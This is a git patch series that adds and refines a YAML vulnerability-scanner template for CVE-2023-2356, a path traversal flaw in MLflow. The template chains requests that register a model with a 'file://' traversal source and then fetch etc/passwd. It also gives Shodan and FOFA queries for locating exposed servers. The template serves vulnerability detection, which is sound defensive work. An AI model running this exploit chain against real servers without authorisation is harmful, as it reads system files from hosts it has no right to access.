From c6e1cabcfe56c8dc0b42524f73dd7bee34979877 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Thu, 4 May 2023 20:59:25 +0800 Subject: [PATCH 1/4] Added CVE-2023-2356 Template --- http/cves/2023/CVE-2023-2356.yaml | 63 +++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2356.yaml diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml new file mode 100644 index 0000000000..a3c3202bfa --- /dev/null +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-2356 + +info: + name: Mlflow 5.2.5 - Local File Inclusion + author: Co5mos + severity: critical + description: | + Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. + reference: + - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 + classification: + cvss-metrics: + cvss-score: + cve-id: CVE-2023-2356 + cwe-id: CWE-23 + metadata: + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" + verified: "true" + tags: cve,cve2023,lfi,huntr,mlflow + +variables: + str: "{{rand_base(6)}}" + +http: + - raw: + - | + POST /api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{str}}"} + + - | + POST /api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} + + - | + GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + internal: true + group: 1 + regex: + - '"version": "([0-9.]+)",' \ No newline at end of file From 4660c9abf3d5d043c579bee2af2a40c6d92bdb58 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 5 May 2023 16:48:47 +0530 Subject: [PATCH 2/4] lint -fix --- http/cves/2023/CVE-2023-2356.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index a3c3202bfa..5e529eec9b 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -10,8 +10,8 @@ info: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 classification: - cvss-metrics: - cvss-score: + cvss-metrics: + cvss-score: cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: @@ -31,14 +31,14 @@ http: Content-Type: application/json {"name": "{{str}}"} - + - | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - + - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 Host: {{Hostname}} @@ -60,4 +60,4 @@ http: internal: true group: 1 regex: - - '"version": "([0-9.]+)",' \ No newline at end of file + - '"version": "([0-9.]+)",' From ed206e5c27ad03e8762f23d9549beb65ad8f14c0 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Mon, 8 May 2023 15:12:08 +0800 Subject: [PATCH 3/4] Update CVE-2023-2356 Template --- http/cves/2023/CVE-2023-2356.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 5e529eec9b..b546ed3b5b 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -10,8 +10,8 @@ info: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 classification: - cvss-metrics: - cvss-score: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: From 717a7410d94dddef3f6d7c07ad1a39037c2c26b3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 23 May 2023 12:02:34 +0530 Subject: [PATCH 4/4] severity & name -updated --- http/cves/2023/CVE-2023-2356.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index b546ed3b5b..8938fb957c 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -1,9 +1,9 @@ id: CVE-2023-2356 info: - name: Mlflow 5.2.5 - Local File Inclusion + name: Mlflow <2.3.0 - Local File Inclusion author: Co5mos - severity: critical + severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. reference: @@ -15,10 +15,10 @@ info: cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: + verified: "true" shodan-query: http.title:"mlflow" fofa-query: app="MLflow" - verified: "true" - tags: cve,cve2023,lfi,huntr,mlflow + tags: cve,cve2023,lfi,huntr,mlflow,oss variables: str: "{{rand_base(6)}}" @@ -37,7 +37,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} + {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1